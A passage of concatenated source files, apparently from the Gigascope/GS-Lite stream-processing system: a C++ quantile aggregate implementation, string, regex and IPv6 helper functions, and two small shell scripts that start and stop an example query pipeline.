t[ptr].gap++;
//printf("AGGR_UPDATE END 1\n");
return;
}
//printf("allocating (1) for %u ",v);
newptr = quant_udaf_lfta3_cursor_alloc<T>(s);
if (newptr == 0) {
gslog(LOG_ALERT, "Out of space in quant_udaf_lfta3_LFTA_AGGR_UPDATE_ (1).\n");
return;
}
t[newptr].val = v;
t[newptr].gap = 1;
t[newptr].del = 0;
t[newptr].next = s->usedptr;
s->usedptr = newptr;
//printf("AGGR_UPDATE END 2\n");
return;
}
// locate $i$ such that (v_i-1 < v <= v_i)
skipdir_search<T>(&(s->sd), v, ptrstack);
//ptr = (ptrstack[0] == 0) ? s->usedptr : s->sd.list[ptrstack[0]].down;
ptr = (ptrstack[0] == 0) ? s->usedptr : ptrstack[0];
while ((t[ptr].next != 0) && (t[t[ptr].next].val < v))
ptr = t[ptr].next;
/*
// duplicate value
if ((t[ptr].next != 0) && (t[t[ptr].next].val == v)) {
t[t[ptr].next].gap++;
printf("AGGR_UPDATE END 3\n");
return;
}
*/
// right boundary case
if (t[ptr].next == 0) {
//printf("allocating (2) for %u ",v);
newptr = quant_udaf_lfta3_cursor_alloc<T>(s);
if (newptr == 0) {
gslog(LOG_ALERT, "Out of space in quant_udaf_lfta3_LFTA_AGGR_UPDATE_ (2).\n");
return;
}
t[newptr].val = v;
t[newptr].gap = 1;
t[newptr].del = 0;
t[newptr].next = 0;
t[ptr].next = newptr;
//printf("AGGR_UPDATE END 4\n");
return;
}
// non-boundary case
//printf("1) t[ptr].next =%d, ptr=%d\n",t[ptr].next,ptr);
obj = t[ptr].gap+t[t[ptr].next].gap+t[t[ptr].next].del;
threshold = (gs_uint32_t)ceil(2.0 * QUANT_EPS * (gs_float_t)s->nelts);
if (obj > threshold) {
//printf("allocating (3) for %u ",v);
newptr = quant_udaf_lfta3_cursor_alloc<T>(s);
if (newptr == 0) {
gslog(LOG_ALERT, "Out of space in quant_udaf_lfta3_LFTA_AGGR_UPDATE_ (3).\n");
return;
}
//printf("newptr=%d\n",newptr);
t[newptr].val = v;
t[newptr].gap = 1;
t[newptr].del = t[t[ptr].next].gap+t[t[ptr].next].del - 1;
t[newptr].next = t[ptr].next;
t[ptr].next = newptr;
skipdir_insert<T>(&(s->sd), ptrstack, newptr, v);
}
else {
// insert into existing bucket
//printf("t[ptr].next =%d\n",t[ptr].next);
t[t[ptr].next].gap++;
}
quant_lfta3_compress<T>(s);
//printf("AGGR_UPDATE END 5\n");
}
template <class T> gs_int32_t quant_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b) {
quant_udaf_lfta3_struct_t<T> *s = (quant_udaf_lfta3_struct_t<T> *)b;
if (s->freeptr == 0)
return 1;
else
return 0;
}
template <class T> void quant_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b)
{
#ifdef COMPRESSED_XFER
quant_udaf_lfta3_struct_t<T> *s = (quant_udaf_lfta3_struct_t<T> *)b;
tuple_t<T> tmp[QUANT_LFTA3_SIZE+1];
gs_uint32_t ptr=s->usedptr;
gs_int32_t i=0,j;
for (; ptr != 0; ptr=s->t[ptr].next) {
tmp[i].val = s->t[ptr].val;
tmp[i].gap = s->t[ptr].gap;
tmp[i].del = s->t[ptr].del;
i++;
}
for (j=1; j <= i; j++) {
s->t[j].val = tmp[j-1].val;
s->t[j].gap = tmp[j-1].gap;
s->t[j].del = tmp[j-1].del;
s->t[j].next = j+1;
}
s->t[i].next = 0;
s->usedptr = 1;
// r->length = (5 + 4*(i+1))*sizeof(gs_uint32_t);
r->length = 5*sizeof(gs_uint32_t) + (i+1)*sizeof(tuple_t<T>);
#endif
#ifndef COMPRESSED_XFER
r->length = sizeof(quant_udaf_lfta3_struct_t<T>);
#endif
//printf("OUTPUT, size is %d\n",r->length);
r->data = b;
}
template <class T> void quant_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b)
{
return;
}
// -----------------------------------------------------------------
// Instantiations
// unsigned int
void quant_ui_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_INIT_<gs_uint32_t>(b);
}
void quant_ui_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v){
quant_udaf_lfta3_LFTA_AGGR_UPDATE_<gs_uint32_t>(b, v);
}
gs_int32_t quant_ui_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b){
return quant_udaf_lfta3_LFTA_AGGR_FLUSHME_<gs_uint32_t>(b);
}
void quant_ui_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_OUTPUT_<gs_uint32_t>(r, b);
}
void quant_ui_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_DESTROY_<gs_uint32_t>(b);
}
// int
void quant_i_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_INIT_<gs_int32_t>(b);
}
void quant_i_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_int32_t v){
quant_udaf_lfta3_LFTA_AGGR_UPDATE_<gs_int32_t>(b, v);
}
gs_int32_t quant_i_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b){
return quant_udaf_lfta3_LFTA_AGGR_FLUSHME_<gs_int32_t>(b);
}
void quant_i_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_OUTPUT_<gs_int32_t>(r, b);
}
void quant_i_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_DESTROY_<gs_int32_t>(b);
}
// unsigned long
void quant_ul_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_INIT_<gs_uint64_t>(b);
}
void quant_ul_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint64_t v){
quant_udaf_lfta3_LFTA_AGGR_UPDATE_<gs_uint64_t>(b, v);
}
gs_int32_t quant_ul_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b){
return quant_udaf_lfta3_LFTA_AGGR_FLUSHME_<gs_uint64_t>(b);
}
void quant_ul_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_OUTPUT_<gs_uint64_t>(r, b);
}
void quant_ul_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_DESTROY_<gs_uint64_t>(b);
}
// long
void quant_l_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_INIT_<gs_int64_t>(b);
}
void quant_l_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_int64_t v){
quant_udaf_lfta3_LFTA_AGGR_UPDATE_<gs_int64_t>(b, v);
}
gs_int32_t quant_l_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b){
return quant_udaf_lfta3_LFTA_AGGR_FLUSHME_<gs_int64_t>(b);
}
void quant_l_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_OUTPUT_<gs_int64_t>(r, b);
}
void quant_l_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_DESTROY_<gs_int64_t>(b);
}
// float
void quant_f_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_INIT_<gs_float_t>(b);
}
void quant_f_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_float_t v){
quant_udaf_lfta3_LFTA_AGGR_UPDATE_<gs_float_t>(b, v);
}
gs_int32_t quant_f_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b){
return quant_udaf_lfta3_LFTA_AGGR_FLUSHME_<gs_float_t>(b);
}
void quant_f_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_OUTPUT_<gs_float_t>(r, b);
}
void quant_f_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b){
quant_udaf_lfta3_LFTA_AGGR_DESTROY_<gs_float_t>(b);
}
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include <sys/types.h>
#include <iostream>
extern "C" {
#include "gsconfig.h"
#include "gstypes.h"
#include <regex.h>
#include <rdtsc.h>
#include <stringhash.h>
#include <errno.h>
#include <unistd.h>
}
#include <stdio.h>
#include <string.h>
#include <vstring.h>
#include <host_tuple.h>
#include <fta.h>
#include<map>
// for htonl,ntohl
#include <netinet/in.h>
#define MAX_PATTERN_LEN 1024
// Defined here to avoid link errors as this array is auto generated for the lfta and referenced in the clearinghouse library which gets linked against the hfta
extern "C" gs_sp_t fta_names[]={0};
// Only used to construct constant strings ...
gs_retval_t Vstring_Constructor(vstring *tmp, gs_csp_t str) {
tmp->length = strlen(str);
if(tmp->length)
tmp->offset = (gs_p_t)strdup(str);
tmp->reserved = SHALLOW_COPY;
return 0;
}
// Assume str is INTERNAL or SHALLOW_COPY.
void hfta_vstr_destroy(vstring * str) {
if (str->length && str->reserved == INTERNAL) {
free((gs_sp_t)str->offset);
}
str->length = 0;
}
// Make the vstring safe to destroy even if its never initialized
// (e.g. stack-allocated groups containing strings)
void hfta_vstr_init(vstring * str) {
str->length = 0;
}
gs_retval_t hfta_vstr_length(vstring *str) {
return str->length;
}
// Assume that SRC is either INTERNAL or SHALLOW_COPY
void hfta_vstr_assign_with_copy_in_tuple(vstring32 * target,
const vstring * src, gs_sp_t data_offset, gs_retval_t int_offset) {
target->length = src->length;
target->offset = int_offset;
target->reserved = PACKED;
if ( src->length)
memcpy(data_offset, (gs_sp_t)src->offset, src->length);
}
// Ted wrote the following function.
// make deep copy of src. Assume that dst is already empty.
// Assume that SRC is either INTERNAL or SHALLOW_COPY
void hfta_vstr_assign_with_copy(vstring *dst, const vstring *src){
dst->length=src->length;
if(src->length){
dst->offset=(gs_p_t)malloc(dst->length);
memcpy((gs_sp_t)(dst->offset),(gs_sp_t)(src->offset),dst->length);
}
dst->reserved=INTERNAL;
}
// Ted wrote the following function.
// Make a deep copy of src. garbage collect dst if needed.
// Assume that SRC is either INTERNAL or SHALLOW_COPY
void hfta_vstr_replace(vstring *dst, const vstring *src){
hfta_vstr_destroy(dst);
hfta_vstr_assign_with_copy(dst,src);
}
#define HFTA_VSTR_LHASHFUNC_PRIME 12916008961267169387ull
gs_uint64_t hfta_vstr_long_hashfunc(const vstring *s) {
gs_uint64_t hash_code;
gs_int32_t n_steps;
gs_int32_t substr_len;
gs_int32_t j, k;
gs_uint64_t sub_hash;
gs_sp_t sv;
sv=(gs_sp_t)(s->offset);
hash_code = 0;
n_steps = s->length / 4;
if(4*n_steps < s->length) n_steps++;
for (j = 0; j < n_steps; j++) {
if(4*(j+1) < s->length) substr_len = 4;
else substr_len = s->length - 4*j;
sub_hash = 0;
for(k=0;k<4;k++){
if(k < substr_len)
sub_hash = (sub_hash << 4) + *sv;
else
sub_hash = (sub_hash << 4);
sv++;
}
hash_code = (sub_hash + hash_code * HFTA_VSTR_LHASHFUNC_PRIME);
}
return(hash_code);
}
#define HFTA_VSTR_HASHFUNC_PRIME 2995999
gs_uint32_t hfta_vstr_hashfunc(const vstring *s) {
gs_uint32_t hash_code;
gs_int32_t n_steps;
gs_int32_t substr_len;
gs_int32_t j;
gs_uint32_t k, sub_hash;
gs_sp_t sv;
sv=(gs_sp_t)(s->offset);
hash_code = 0;
n_steps = s->length / 4;
if(4*n_steps < s->length) n_steps++;
for (j = 0; j < n_steps; j++) {
if(4*(j+1) < s->length) substr_len = 4;
else substr_len = s->length - 4*j;
sub_hash = 0;
for(k=0;k<4;k++){
if(k < substr_len)
sub_hash = (sub_hash << 4) + *sv;
else
sub_hash = (sub_hash << 4);
sv++;
}
hash_code = (sub_hash + hash_code * HFTA_VSTR_HASHFUNC_PRIME);
}
return(hash_code);
}
// return negative if s1 < s2, 0 if s1==s2, positive if s1>s2
gs_retval_t hfta_vstr_compare(const vstring * s1, const vstring * s2) {
gs_int32_t minlen,cmp_ret;
minlen=(s1->length<s2->length?s1->length:s2->length);
cmp_ret=memcmp((void *)s1->offset,(void *)s2->offset,minlen);
if(cmp_ret) return cmp_ret;
return(s1->length - s2->length);
}
gs_retval_t hfta_vstr_equal(const vstring * s1, const vstring * s2) {
gs_int32_t x;
if(s1->length != s2->length)
return -1;
// cmp_ret=memcmp((void *)s1->offset,(void *)s2->offset,s1->length);
for(x=0;x<s1->length;x++) {
if (((char *)(s1->offset))[x]!=((char *)(s2->offset))[x]) {
return -1;
}
}
return 0;
}
gs_param_handle_t register_handle_for_str_regex_match_slot_1(vstring* pattern) {
regex_t * reg;
gs_int32_t res;
if ((reg=(regex_t *) malloc(sizeof(regex_t)))==0) {
gslog(LOG_EMERG, "No memory for regular expression %s\n",
(gs_sp_t)(pattern->offset));
return 0;
}
if (regcomp(reg,(char*)(pattern->offset), REG_NEWLINE|REG_EXTENDED|REG_NOSUB)!=0) {
gslog(LOG_EMERG, "Illegal regular expression %s\n",
(gs_sp_t)(pattern->offset));
return 0;
}
return (gs_param_handle_t) reg;
}
gs_uint32_t str_regex_match(vstring* str, gs_param_handle_t pattern_handle) {
regex_t * reg = (regex_t *) pattern_handle ;
gs_int32_t res;
static gs_sp_t d=0;
static gs_uint32_t dlen=0;
// grow our static buffer to the longest string we ever see
if ((str->length+1) >= dlen) {
if (d!=0) free((void*)d);
dlen=0;
d=0;
if ((d=(gs_sp_t)malloc(str->length+1))==0) return 0;
dlen=str->length+1;
}
if (str->length==0) return 0;
// copy the string and 0 terminate it
memcpy((void *)d,(void *) str->offset, str->length);
d[str->length]=0;
res = REG_NOMATCH;
res = regexec(reg, d, 0, NULL, 0);
return (res==REG_NOMATCH)?0:1;
}
gs_retval_t deregister_handle_for_str_regex_match_slot_1(gs_param_handle_t handle) {
regex_t * x = (regex_t *) handle;
regfree(x);
if (x!=0) free(x);
return 0;
}
gs_param_handle_t register_handle_for_str_partial_regex_match_slot_1(vstring* pattern) {
regex_t * reg;
gs_int32_t res;
if ((reg=(regex_t *) malloc(sizeof(regex_t)))==0) {
gslog(LOG_EMERG, "No memory for regular expression %s\n",
(gs_sp_t)(pattern->offset));
return 0;
}
if (regcomp(reg,(gs_sp_t)(pattern->offset), REG_NEWLINE|REG_EXTENDED|REG_NOSUB)!=0) {
gslog(LOG_EMERG, "Illegal regular expression %s\n",
(gs_sp_t)(pattern->offset));
return 0;
}
return (gs_param_handle_t) reg;
}
gs_uint32_t str_partial_regex_match(vstring* str, gs_param_handle_t pattern_handle,
uint maxlen) {
regex_t * reg = (regex_t *) pattern_handle ;
gs_int32_t res;
gs_int32_t end;
static gs_sp_t d=0;
static gs_uint32_t dlen=0;
// grow our static buffer to the longest string we ever see
if ((str->length+1) >= dlen) {
if (d!=0) free((void*)d);
dlen=0;
d=0;
if ((d=(gs_sp_t)malloc(str->length+1))==0) return 0;
dlen=str->length+1;
}
if (str->length==0) return 0;
end=(maxlen>(str->length))?(str->length):maxlen;
// copy the string and 0 terminate it
memcpy((void *)d,(void *) str->offset, end);
d[end]=0;
res = REG_NOMATCH;
res = regexec(reg, d,0, NULL, 0);
return (res==REG_NOMATCH)?0:1;
}
gs_retval_t deregister_handle_for_str_partial_regex_match_slot_1(
gs_param_handle_t handle) {
regex_t * x = (regex_t *) handle;
regfree(x);
if (x!=0) free(x);
return 0;
}
gs_param_handle_t register_handle_for_str_extract_regex_slot_1(vstring* pattern) {
regex_t * reg;
if ((reg=(regex_t *) malloc(sizeof(regex_t)))==0) {
gslog(LOG_EMERG, "No memory for regular expression %s\n",
(gs_sp_t)(pattern->offset));
return 0;
}
if (regcomp(reg,(gs_sp_t)(pattern->offset), REG_EXTENDED)!=0) {
gslog(LOG_EMERG, "Illegal regular expression %s\n",
(gs_sp_t)(pattern->offset));
return 0;
}
return (gs_param_handle_t) reg;
}
/* partial function return 0 if the value is valid */
gs_retval_t str_extract_regex( vstring * result, vstring * str, gs_param_handle_t handle) {
regex_t * reg = (regex_t *) handle ;
gs_sp_t source = (gs_sp_t)(str->offset);
gs_retval_t res;
regmatch_t match;
static gs_sp_t d=0;
static gs_uint32_t dlen=0;
// grow our static buffer to the longest string we ever see
if ((str->length+1) >= dlen) {
if (d!=0) free((void*)d);
dlen=0;
d=0;
if ((d=(gs_sp_t)malloc(str->length+1))==0) return 1;
dlen=str->length+1;
}
if (str->length==0) return 1;
// copy the string and 0 terminate it
memcpy((void *)d,(void *) str->offset, str->length);
d[str->length]=0;
res = REG_NOMATCH;
res = regexec(reg, d, 1, &match, 0);
if (res==REG_NOMATCH) return 1;
result->offset= (gs_p_t) &source[match.rm_so];
result->length=match.rm_eo-match.rm_so;
result->reserved = SHALLOW_COPY;
return 0;
}
gs_retval_t deregister_handle_for_str_extract_regex_slot_1(gs_param_handle_t handle) {
regex_t * x = (regex_t *) handle;
regfree(x);
if (x!=0) free(x);
return 0;
}
// -------------------------------------------------
// More substring functions
// get last n bytes, if available
// getting the prefix is done by str_truncate, defined in the include file
gs_retval_t str_suffix(vstring *result, vstring *s, gs_uint32_t n){
register gs_p_t st = (gs_p_t)s->offset;
int prefix = (n > s->length) ? 0 : s->length-n;
result->offset = st + prefix;
result->length = s->length-prefix;
result->reserved = SHALLOW_COPY;
return 0;
}
// Split the string on sep, get the i'th substring, if any
gs_retval_t get_list_entry(vstring *result, vstring *l, vstring *sep, gs_uint32_t pos){
char s;
gs_int32_t c;
result->offset = l->offset; // empty return string
result->reserved = SHALLOW_COPY;
result->length = 0;
if(sep->length > 0){ // get the sep char, ensure the string is nonempty
s = ((gs_sp_t)(sep->offset))[0];
}else{
return 0;
}
for(c=0;c < l->length && pos>0; ++c){
if(((gs_sp_t)(l->offset))[c] == s){
pos--;
}
}
if(pos>0 || c >= l->length-1){ // not enough seps, or final string is empty
return 0;
}
result->offset = l->offset + c;
for(; c<l->length && ((gs_sp_t)(l->offset))[c] != s; ++c, ++result->length);
return 0;
}
// -------------------------------------------------
static gs_uint32_t nextint(struct vstring *str , gs_uint32_t * offset, gs_uint32_t *res) {
gs_uint8_t * s = (gs_uint8_t *)(str->offset);
int v = 0;
*res = 0;
while(*offset<str->length) {
if ((s[*offset]>='0') && (s[*offset]<='9')) {
v=1;
*res= (*res*10) + (gs_uint32_t) (s[*offset]-'0');
} else {
if (v!=0) { // got some valid result
return 1;
} // otherwise skip leading grabage
}
(*offset)++;
}
return v;
}
gs_uint32_t strtoi(gs_uint32_t * r, struct vstring * s)
{
gs_uint32_t offset;
offset=0;
if (nextint(s,&offset,r)==0) return 1;
return 0;
}
gs_param_handle_t register_handle_for_strtoi_c_slot_0(vstring* istr) {
gs_uint32_t offset,r;
offset=0;
if (nextint(istr,&offset,&r)!=0)
return (gs_param_handle_t) r;
return (gs_param_handle_t) 0;
}
gs_retval_t deregister_handle_for_strtoi_c_slot_0(gs_param_handle_t h) {
return 0;
}
gs_uint32_t strtoip(gs_uint32_t * r, struct vstring * s)
{
gs_uint32_t ip1,ip2,ip3,ip4,offset;
offset=0;
if (nextint(s,&offset,&ip1)==0) return 1;
//fprintf (stderr, "1 %u %u\n",ip1,offset);
if (nextint(s,&offset,&ip2)==0) return 1;
//fprintf (stderr, "2 %u %u\n",ip2,offset);
if (nextint(s,&offset,&ip3)==0) return 1;
//fprintf (stderr, "3 %u %u\n",ip3,offset);
if (nextint(s,&offset,&ip4)==0) return 1;
//fprintf (stderr, "4 %u %u\n",ip4,offset);
*r=ip1<<24|ip2<<16|ip3<<8|ip4;
return 0;
}
gs_param_handle_t register_handle_for_strtoip_c_slot_0(vstring* istr) {
gs_uint32_t ip1,ip2,ip3,ip4,offset,r;
offset=0;
if (nextint(istr,&offset,&ip1)==0) return (gs_param_handle_t)0;
if (nextint(istr,&offset,&ip2)==0) return (gs_param_handle_t)0;
if (nextint(istr,&offset,&ip3)==0) return (gs_param_handle_t)0;
if (nextint(istr,&offset,&ip4)==0) return (gs_param_handle_t)0;
r=ip1<<24|ip2<<16|ip3<<8|ip4;
return (gs_param_handle_t)r;
}
gs_retval_t deregister_handle_for_strtoip_c_slot_0(gs_param_handle_t h) {
return 0;
}
gs_uint32_t partn_hash( gs_uint32_t ip1, gs_uint32_t ip2) {
return (ip1^ip2);
}
gs_uint32_t rand_hash() {
return rand();
}
///////////////////////////////////////
// IPv6 fcns.
// return negative if s1 < s2, 0 if s1==s2, positive if s1>s2
gs_retval_t hfta_ipv6_compare(const hfta_ipv6_str &i1, const hfta_ipv6_str &i2) {
if(i1.v[0] > i2.v[0])
return 1;
if(i1.v[0] < i2.v[0])
return -1;
if(i1.v[1] > i2.v[1])
return 1;
if(i1.v[1] < i2.v[1])
return -1;
if(i1.v[2] > i2.v[2])
return 1;
if(i1.v[2] < i2.v[2])
return -1;
if(i1.v[3] > i2.v[3])
return 1;
if(i1.v[3] < i2.v[3])
return -1;
return 0;
}
hfta_ipv6_str And_Ipv6(const hfta_ipv6_str &i1, const hfta_ipv6_str &i2){
hfta_ipv6_str ret;
ret.v[0] = i1.v[0] & i2.v[0];
ret.v[1] = i1.v[1] & i2.v[1];
ret.v[2] = i1.v[2] & i2.v[2];
ret.v[3] = i1.v[3] & i2.v[3];
return ret;
}
hfta_ipv6_str Or_Ipv6(const hfta_ipv6_str &i1, const hfta_ipv6_str &i2){
hfta_ipv6_str ret;
ret.v[0] = i1.v[0] | i2.v[0];
ret.v[1] = i1.v[1] | i2.v[1];
ret.v[2] = i1.v[2] | i2.v[2];
ret.v[3] = i1.v[3] | i2.v[3];
return ret;
}
gs_uint32_t hfta_ipv6_hashfunc(const hfta_ipv6_str *s) {
return s->v[0] ^ s->v[1] ^ s->v[2] ^ s->v[3];
}
hfta_ipv6_str hton_ipv6(hfta_ipv6_str s){
hfta_ipv6_str ret;
// ret.v[0] = htonl(s.v[0]);
// ret.v[1] = htonl(s.v[1]);
// ret.v[2] = htonl(s.v[2]);
// ret.v[3] = htonl(s.v[3]);
ret.v[0] = s.v[0];
ret.v[1] = s.v[1];
ret.v[2] = s.v[2];
ret.v[3] = s.v[3];
return ret;
}
hfta_ipv6_str ntoh_ipv6(hfta_ipv6_str s){
hfta_ipv6_str ret;
// ret.v[0] = ntohl(s.v[0]);
// ret.v[1] = ntohl(s.v[1]);
// ret.v[2] = ntohl(s.v[2]);
// ret.v[3] = ntohl(s.v[3]);
ret.v[0] = s.v[0];
ret.v[1] = s.v[1];
ret.v[2] = s.v[2];
ret.v[3] = s.v[3];
return ret;
}
int HFTA_Ipv6_Constructor(hfta_ipv6_str *s, gs_csp_t l) {
gs_uint32_t i0=0,i1=0,i2=0,i3=0,i4=0,i5=0,i6=0,i7=0;
sscanf(l,"%x:%x:%x:%x:%x:%x:%x:%x",&i0,&i1,&i2,&i3,&i4,&i5,&i6,&i7);
s->v[0] = ((i0 & 0xffff) << 16) | (i1 & 0xffff);
s->v[1] = ((i2 & 0xffff) << 16) | (i3 & 0xffff);
s->v[2] = ((i4 & 0xffff) << 16) | (i5 & 0xffff);
s->v[3] = ((i6 & 0xffff) << 16) | (i7 & 0xffff);
return(0);
}
gs_retval_t str_exists_substr(vstring * s1,vstring * s2)
{
gs_uint8_t *st1 = (gs_uint8_t *)s1->offset;
gs_uint8_t *st2 = (gs_uint8_t *)s2->offset;
gs_uint8_t *s2f = (gs_uint8_t *)s2->offset;
gs_uint8_t len1 = s1->length-s2->length;
gs_uint8_t len2 = s2->length;
gs_uint8_t x,y;
for (x=0; x<len1 ; x++)
{
if (st1[x]== *s2f)
{
for (y=0; y<len2 && st1[x+y]==st2[y];y++);
if (y==len2)
return 1;
}
}
return 0;
}
gs_retval_t str_compare(vstring *s1,vstring *s2)
{
return hfta_vstr_compare(s1,s2);
}
gs_uint32_t str_match_offset( gs_uint32_t offset, vstring *s1, vstring *s2)
{
gs_uint8_t *st1 = (gs_uint8_t *)s1->offset;
gs_uint8_t *st2 = &(((gs_uint8_t *)s2->offset)[offset]);
gs_int32_t x;
gs_int32_t len2 = s2->length-offset;
gs_int32_t len1 = s1->length;
if (len2 < len1)
return 0;
for(x = 0; x < len1; x++)
{
if (st1[x] != st2[x])
return 0;
}
return 1;
}
gs_uint32_t byte_match_offset( gs_uint32_t offset, gs_uint32_t val,vstring *s2)
{
gs_uint8_t *st2 = (gs_uint8_t *)s2->offset;
gs_uint8_t v = (unsigned char) val;
// if ((s2->length <= offset)||(offset<0))
if (s2->length <= offset)
return 0;
return (st2[offset]==v)?1:0;
}
// -------------------------------------------------------
// map_int_to_string and its support functions, structs
struct int_to_string_map_struct{
std::map<gs_int64_t, vstring> i2s_map;
std::string fname;
vstring empty_string;
};
gs_param_handle_t register_handle_for_int_to_string_map_slot_1(vstring *filename){
int_to_string_map_struct *map_struct;
map_struct = new int_to_string_map_struct();
if(map_struct == NULL){
gslog(LOG_EMERG, "int_to_string_map:: Could not allocate handle memory\n");
return 0;
}
map_struct->empty_string.offset = (gs_p_t)malloc(1);
map_struct->empty_string.reserved = INTERNAL;
map_struct->empty_string.length = 0;
gs_sp_t filenamec;
filenamec = (gs_sp_t)alloca(filename->length+1);
if (filenamec==0) {
gslog(LOG_EMERG, "int_to_string_map:: Could not allocate filename memory\n");
return 0;
}
memcpy(filenamec,(gs_sp_t)filename->offset,filename->length);
filenamec[filename->length]=0;
map_struct->fname = filenamec;
FILE *fl = fopen(filenamec, "r");
if(fl==NULL){
gslog(LOG_EMERG, "int_to_string_map:: Could not open regex file %s \n",filename);
return 0;
}
gs_int32_t buflen = 10000;
char buf[buflen], buf_str[buflen];
gs_int64_t val;
char *fret;
fret = fgets(buf, buflen, fl);
while(fret != NULL){
int nvals = sscanf(buf, "%lld,%s", &val, buf_str);
if(nvals >= 2){
vstring new_str;
new_str.reserved = SHALLOW_COPY;
new_str.length = strlen(buf_str);
new_str.offset = (gs_p_t)malloc(new_str.length);
memcpy((char *)new_str.offset, buf_str, new_str.length);
map_struct->i2s_map[val] = new_str;
}
fret = fgets(buf, buflen, fl);
}
fclose(fl);
return (gs_param_handle_t) map_struct;
}
gs_retval_t int_to_string_map(vstring *result, gs_int64_t val, gs_param_handle_t handle){
int_to_string_map_struct *map_struct = (int_to_string_map_struct *)handle;
if(map_struct->i2s_map.count(val)>0){
vstring ret = map_struct->i2s_map[val];
result->offset = ret.offset;
result->reserved = ret.reserved;
result->length = ret.length;
}else{
result->offset = map_struct->empty_string.offset;
result->reserved = map_struct->empty_string.reserved;
result->length = map_struct->empty_string.length;
}
return 0;
}
gs_param_handle_t deregister_handle_for_int_to_string_map_slot_1(gs_param_handle_t handle){
int_to_string_map_struct *map_struct = (int_to_string_map_struct *)handle;
for(std::map<gs_int64_t, vstring>::iterator i2si = map_struct->i2s_map.begin(); i2si!=map_struct->i2s_map.end(); ++i2si){
free((void *)((*i2si).second.offset));
}
free((void *)(map_struct->empty_string.offset));
delete map_struct;
}
// ---------------------------------------------------
// Return a (binary, non-ascii) string in its hex representation
static char hexmap[16] = {
'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'
};
gs_retval_t to_hex_string(vstring *result, vstring *val){
result->length = 2*(val->length);
result->offset = (gs_p_t)malloc(result->length);
result->reserved = INTERNAL;
unsigned char *rs = (unsigned char *)(result->offset);
unsigned char *vs = (unsigned char *)(val->offset);
for(int c=0;c<val->length; ++c){
rs[2*c] = hexmap[vs[c] >> 4];
rs[2*c+1] = hexmap[vs[c] & 0x0f];
}
return 0;
}
// ---------------------------------------------
// sum up unsigned integers expressed as a string with separators,
// e.g. on input '34|45|56' and sep '|', return 135.
// This kind of thing is common in Nokia PCMD data.
// gracefully handle empty entries, e.g. '|8|' should return 8
gs_int64_t sum_uint_in_list(struct vstring *list, struct vstring *sepchar){
gs_int64_t ret = 0;
gs_int64_t val = 0;
char sep;
char v;
int c;
if(sepchar->length < 1)
return 0;
sep = ((char *)(sepchar->offset))[0];
for(c=0;c<list->length;++c){
v = ((char *)(list->offset))[c];
if(v==sep){
ret+=val;
val = 0;
}else{
val = 10*val + (v>='0' && v<='9')*(v-'0');
}
}
ret += val;
return ret;
}
// Convert an string to an integer
gs_int64_t to_llong(vstring *v){
gs_int64_t ret=0;
gs_uint8_t d;
int c;
int neg=1;
if(v->length < 1)
return 0;
d = ((char *)(v->offset))[0];
if(d=='-'){
neg=-1;
}else{
ret = (d>='0' && d<='9')*(d-'0');
}
for(c=1;c<v->length;++c){
d = ((char *)(v->offset))[c];
ret = 10*ret+(d>='0' && d<='9')*(d-'0');
}
return neg*ret;
}
<file_sep>#!/bin/sh
./killexample
sleep 1
./runit
sleep 10
../../bin/gsprintconsole `cat gshub.log` default example1 -s > example1.csv &
../../bin/gsprintconsole `cat gshub.log` default example2 -s > example2.csv &
sleep 1
../../bin/start_processing
<file_sep>#!/bin/sh
./stopit
killall gsprintconsole
killall gen_feed.py
killall -9 gsprintconsole
killall -9 gen_feed.py
<file_sep>#include <stdio.h>
#include <stdlib.h>
